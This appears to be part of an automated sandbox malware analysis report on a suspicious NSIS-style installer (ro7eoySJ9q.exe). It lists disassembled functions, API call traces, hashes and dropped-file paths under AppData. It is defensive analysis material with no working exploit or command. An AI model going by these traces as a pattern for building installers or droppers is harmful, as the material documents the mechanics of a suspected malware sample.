                                                        • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D
                                                        Function 00403ABD Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 239 403abd-403acf 240 403c10-403c1f 239->240 241 403ad5-403adb 239->241 243 403c21-403c69 GetDlgItem * 2 call 403f95 SetClassLongW call 40140b 240->243 244 403c6e-403c83 240->244 241->240 242 403ae1-403aea 241->242 245 403aec-403af9 SetWindowPos 242->245 246 403aff-403b02 242->246 243->244 248 403cc3-403cc8 call 403fe1 244->248 249 403c85-403c88 244->249 245->246 251 403b04-403b16 ShowWindow 246->251 252 403b1c-403b22 246->252 258 403ccd-403ce8 248->258 254 403c8a-403c95 call 401389 249->254 255 403cbb-403cbd 249->255 251->252 259 403b24-403b39 DestroyWindow 252->259 260 403b3e-403b41 252->260 254->255 270 403c97-403cb6 SendMessageW 254->270 255->248 257 403f62 255->257 265 403f64-403f6b 257->265 263 403cf1-403cf7 258->263 264 403cea-403cec call 40140b 258->264 266 403f3f-403f45 259->266 268 403b43-403b4f SetWindowLongW 260->268 269 403b54-403b5a 260->269 273 403f20-403f39 DestroyWindow EndDialog 263->273 274 403cfd-403d08 263->274 264->263 266->257 271 403f47-403f4d 266->271 268->265 275 403b60-403b71 GetDlgItem 269->275 276 403bfd-403c0b call 403ffc 269->276 270->265 271->257 280 403f4f-403f58 ShowWindow 271->280 273->266 274->273 281 403d0e-403d5b call 405d68 call 403f95 * 3 GetDlgItem 274->281 277 403b90-403b93 275->277 278 403b73-403b8a SendMessageW IsWindowEnabled 275->278 276->265 282 403b95-403b96 277->282 283 403b98-403b9b 277->283 278->257 278->277 280->257 309 403d65-403da1 ShowWindow KiUserCallbackDispatcher call 403fb7 EnableWindow 281->309 310 403d5d-403d62 281->310 286 403bc6-403bcb call 403f6e 282->286 287 403ba9-403bae 283->287 288 403b9d-403ba3 283->288 286->276 290 403be4-403bf7 SendMessageW 287->290 292 403bb0-403bb6 287->292 288->290 291 403ba5-403ba7 288->291 290->276 291->286 295 403bb8-403bbe call 40140b 292->295 296 403bcd-403bd6 call 40140b 292->296 307 403bc4 295->307 296->276 305 403bd8-403be2 296->305 305->307 307->286 313 403da3-403da4 309->313 314 403da6 309->314 310->309 315 403da8-403dd6 GetSystemMenu EnableMenuItem SendMessageW 313->315 314->315 316 403dd8-403de9 SendMessageW 315->316 317 403deb 315->317 318 403df1-403e2f call 403fca call 405d46 lstrlenW call 405d68 SetWindowTextW call 401389 316->318 317->318 318->258 327 403e35-403e37 318->327 327->258 328 403e3d-403e41 327->328 329 403e60-403e74 DestroyWindow 328->329 330 403e43-403e49 328->330 329->266 332 403e7a-403ea7 CreateDialogParamW 329->332 330->257 331 403e4f-403e55 330->331 331->258 333 403e5b 331->333 332->266 334 403ead-403f04 call 403f95 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 332->334 333->257 334->257 339 403f06-403f19 ShowWindow call 403fe1 334->339 341 403f1e 339->341 341->266
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                        • ShowWindow.USER32(?), ref: 00403B16
                                                        • DestroyWindow.USER32 ref: 00403B2A
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                        • GetDlgItem.USER32(?,?), ref: 00403B67
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                        • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                        • EnableWindow.USER32(?,?), ref: 00403D99
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                        • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                        • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                        • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                        • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID:
                                                        • API String ID: 3282139019-0
                                                        • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                        • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                        • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                        • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D
                                                        Function 00402CFF Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 342 402cff-402d4d GetTickCount GetModuleFileNameW call 4059cf 345 402d59-402d87 call 405d46 call 4057fa call 405d46 GetFileSize 342->345 346 402d4f-402d54 342->346 354 402e74-402e82 call 402c9b 345->354 355 402d8d 345->355 347 402f31-402f35 346->347 361 402e84-402e87 354->361 362 402ed7-402edc 354->362 357 402d92-402da9 355->357 359 402dab 357->359 360 402dad-402daf call 403160 357->360 359->360 366 402db4-402db6 360->366 364 402e89-402e9a call 403192 call 403160 361->364 365 402eab-402ed5 GlobalAlloc call 403192 call 402f38 361->365 362->347 384 402e9f-402ea1 364->384 365->362 390 402ee8-402ef9 365->390 368 402dbc-402dc3 366->368 369 402ede-402ee6 call 402c9b 366->369 374 402dc5-402dd9 call 40598a 368->374 375 402e3f-402e43 368->375 369->362 380 402e4d-402e53 374->380 389 402ddb-402de2 374->389 379 402e45-402e4c call 402c9b 375->379 375->380 379->380 386 402e62-402e6c 380->386 387 402e55-402e5f call 40615e 380->387 384->362 392 402ea3-402ea9 384->392 386->357 391 402e72 386->391 387->386 389->380 395 402de4-402deb 389->395 396 402f01-402f06 390->396 397 402efb 390->397 391->354 392->362 392->365 395->380 398 402ded-402df4 395->398 399 402f07-402f0d 396->399 397->396 398->380 400 402df6-402dfd 398->400 399->399 401 402f0f-402f2a SetFilePointer call 40598a 399->401 400->380 402 402dff-402e1f 400->402 405 402f2f 401->405 402->362 404 402e25-402e29 402->404 406 402e31-402e39 404->406 407 402e2b-402e2f 404->407 405->347 406->380 408 402e3b-402e3d 406->408 407->391 407->406 408->380
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402D10
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ro7eoySJ9q.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                          • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                          • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 4283519449-604481379
                                                        • Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                        • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                        • Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                        • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D
                                                        Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 540 401752-401777 call 402ad0 call 405825 545 401781-401793 call 405d46 call 4057ae lstrcatW 540->545 546 401779-40177f call 405d46 540->546 551 401798-401799 call 405fda 545->551 546->551 555 40179e-4017a2 551->555 556 4017a4-4017ae call 406089 555->556 557 4017d5-4017d8 555->557 565 4017c0-4017d2 556->565 566 4017b0-4017be CompareFileTime 556->566 558 4017e0-4017fc call 4059cf 557->558 559 4017da-4017db call 4059aa 557->559 567 401870-401899 call 404ffa call 402f38 558->567 568 4017fe-401801 558->568 559->558 565->557 566->565 582 4018a1-4018ad SetFileTime 567->582 583 40189b-40189f 567->583 569 401852-40185c call 404ffa 568->569 570 401803-401841 call 405d46 * 2 call 405d68 call 405d46 call 405529 568->570 580 401865-40186b 569->580 570->555 602 401847-401848 570->602 585 402966 580->585 584 4018b3-4018be CloseHandle 582->584 583->582 583->584 587 4018c4-4018c7 584->587 588 40295d-402960 584->588 590 402968-40296c 585->590 591 4018c9-4018da call 405d68 lstrcatW 587->591 592 4018dc-4018df call 405d68 587->592 588->585 598 4018e4-402241 call 405529 591->598 592->598 598->588 598->590 602->580 604 40184a-40184b 602->604 604->569
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 00401793
                                                        • CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 004017B8
                                                          • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                          • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                          • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,759223A0), ref: 00405055
                                                          • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                          • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Generic$Heteric
                                                        • API String ID: 1941528284-665897320
                                                        • Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                        • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                        • Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                        • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D
                                                        Function 00402F38 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 606 402f38-402f51 607 402f53 606->607 608 402f5a-402f62 606->608 607->608 609 402f64 608->609 610 402f6b-402f70 608->610 609->610 611 402f80-402f8d call 403160 610->611 612 402f72-402f7b call 403192 610->612 616 402f93-402f97 611->616 617 40310d 611->617 612->611 618 4030f6-4030f8 616->618 619 402f9d-402fe4 GetTickCount 616->619 620 40310f-403110 617->620 621 4030fa-4030fd 618->621 622 40314c-40314f 618->622 623 403156 619->623 624 402fea-402ff2 619->624 625 403159-40315d 620->625 628 403102-40310b call 403160 621->628 629 4030ff 621->629 626 403151 622->626 627 403112-403118 622->627 623->625 630 402ff4 624->630 631 402ff7-403005 call 403160 624->631 626->623 634 40311a 627->634 635 40311d-40312b call 403160 627->635 628->617 641 403153 628->641 629->628 630->631 631->617 639 40300b-403014 631->639 634->635 635->617 643 40312d-40313f WriteFile 635->643 642 40301a-40303a call 4061cc 639->642 641->623 649 403040-403053 GetTickCount 642->649 650 4030ee-4030f0 642->650 645 403141-403144 643->645 646 4030f2-4030f4 643->646 645->646 648 403146-403149 645->648 646->620 648->622 651 403055-40305d 649->651 652 40309e-4030a2 649->652 650->620 653 403065-403096 MulDiv wsprintfW call 404ffa 651->653 654 40305f-403063 651->654 655 4030e3-4030e6 652->655 656 4030a4-4030a7 652->656 662 40309b 653->662 654->652 654->653 655->624 657 4030ec 655->657 659 4030c9-4030d4 656->659 660 4030a9-4030bd WriteFile 656->660 657->623 661 4030d7-4030db 659->661 660->646 663 4030bf-4030c2 660->663 661->642 664 4030e1 661->664 662->652 663->646 665 4030c4-4030c7 663->665 664->623 665->661
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402FA3
                                                        • GetTickCount.KERNEL32 ref: 00403048
                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                        • wsprintfW.USER32 ref: 00403084
                                                        • WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CountTick$FileWritewsprintf
                                                        • String ID: ... %d%%$znA
                                                        • API String ID: 4209647438-2447772013
                                                        • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                        • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                        • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                        • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9
                                                        Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 666 404ffa-40500f 667 405015-405026 666->667 668 4050c6-4050ca 666->668 669 405031-40503d lstrlenW 667->669 670 405028-40502c call 405d68 667->670 672 40505a-40505e 669->672 673 40503f-40504f lstrlenW 669->673 670->669 675 405060-405067 SetWindowTextW 672->675 676 40506d-405071 672->676 673->668 674 405051-405055 lstrcatW 673->674 674->672 675->676 677 405073-4050b5 SendMessageW * 3 676->677 678 4050b7-4050b9 676->678 677->678 678->668 679 4050bb-4050be 678->679 679->668
                                                        APIs
                                                        • lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                        • lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,759223A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                        • lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,759223A0), ref: 00405055
                                                        • SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Frisurens
                                                        • API String ID: 2531174081-3121014363
                                                        • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                        • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                        • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                        • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98
                                                        Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 680 4015b9-4015cd call 402ad0 call 405859 685 401614-401617 680->685 686 4015cf-4015eb call 4057db CreateDirectoryW 680->686 687 401646-402195 call 401423 685->687 688 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 685->688 693 40160a-401612 686->693 694 4015ed-4015f8 GetLastError 686->694 702 402729-402730 687->702 703 40295d-40296c 687->703 688->703 704 40163e-401641 688->704 693->685 693->686 697 401607 694->697 698 4015fa-401605 GetFileAttributesW 694->698 697->693 698->693 698->697 702->703 704->703
                                                        APIs
                                                          • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,75923420,004055F5,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405867
                                                          • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                          • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                        • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,00000000,000000F0), ref: 00401630
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00401623
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
